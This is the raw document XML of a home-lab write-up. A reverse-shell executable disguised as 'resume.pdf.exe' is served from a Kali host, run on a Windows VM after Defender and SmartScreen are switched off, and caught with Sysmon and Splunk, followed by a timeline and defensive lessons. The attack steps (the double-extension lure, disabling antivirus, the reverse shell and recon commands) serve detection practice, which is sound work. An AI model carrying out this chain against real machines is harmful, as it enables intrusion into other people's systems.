    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If that didn’t work, you can try to navigate to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Virus &amp; Threat Protection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Turn off </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Real-time protection</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Next, on Windows machine, navigate to </w:t>
      </w:r>
      <w:hyperlink r:id="rId35">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://192.168.17.130:9999/Desktop/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2959100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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20"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download the file and bypass Windows Security Measures. Then navigate to the folder that stored the file and run it. In my case, it is the Download folder.</w:t>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731200" cy="622300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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Also, you should see some activities happening on the Kali terminal</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731200" cy="2552700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After running the .exe file, make sure to verify that it’s running.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1143000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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Handling the Reverse Shell on Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the Kali machine, confirms the established connection with the terminal running Metasploit (Remember to run the file on the Windows machine to see the correct result.)</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731200" cy="2476500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="35"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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If everything worked correctly, we should be able to see the last 3 lines.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, run a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command to start a reverse shell.</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731200" cy="1130300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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Now we are in a reverse shell session, and are able to execute commands on the Windows machine. I will try several commands: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">net user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> net local group</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ipconfig</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to test.</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4400550" cy="628650"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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400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5731200" cy="6692900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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731200" cy="2476500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="14"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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As you can see from the images above, we are able to execute commands as if we are local user and have successfully infiltrated the target victim.</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Telemetry in Splunk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, we can go to Splunk, navigate to the Search and &amp; Reporting  App to query the data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since I named the index storing logs data from the Windows machine “wineventlog” and “sysmon”, we can search “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index=sysmon resume.pdf.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">” or “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index=winteventlog resume.pdf.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">” or “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index=* host=Win11VM resume.pdf.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserv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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2667000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="31"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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We refined the query to show a concise table of _time, ParentImage, Image, CommandLine, making the malicious chain unmistakable:</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731200" cy="1397000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7"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Fonts w:ascii="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, Splunk shows the full attack chain: downloaded executable → cmd.exe → net.exe / ipconfig.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">![Final detection chain proving parent/child process lineage]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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2159000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="38"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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_j09uk7d73jq1" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Timeline Reconstruction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recon: Attacker identifies its IP and scans the Windows host (Nmap).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload Prep:** A Windows-compatible reverse-shell binary is generated for telemetry testing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Delivery: Binary is hosted on Kali’s HTTP server and downloaded by Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Execution: User runs .pdf.exe; SmartScreen warning is bypassed (lab only).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C2: Handler on Kali receives a session; basic reconnaissance commands are executed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection: Sysmon + Splunk capture and correlate the parent/child chain and command lines.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_z36bptvrinso" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Isolation is everything: Internal-only networking keeps experiments safe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User deception is trivial: Double extensions (.pdf.exe) still trick users. Enable “show file extensions.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Least privilege matters: Admin users make attacker life easy; standardize non-admin daily use.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Application control helps: Use AppLocker/allow-listing to block unknown binaries (especially in user-write paths).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EDR + Logging: Keep Defender/EDR enabled with tamper protection; Sysmon + SIEM provide the forensic truth.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detections to keep: Alert on suspicious parent/child combos (e.g., *.pdf.exe → cmd.exe, cmd.exe → net.exe) and unusual outbound connections from user processes.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5.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SwiftOnSecurity/sysmon-config" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.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2.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId33"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image" Target="media/image39.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.17.130:9999/Desktop/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://download.splunk.com/products/splunk/releases/10.0.1/linux/splunk-10.0.1-c486717c322b-linux-amd64.deb" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId38"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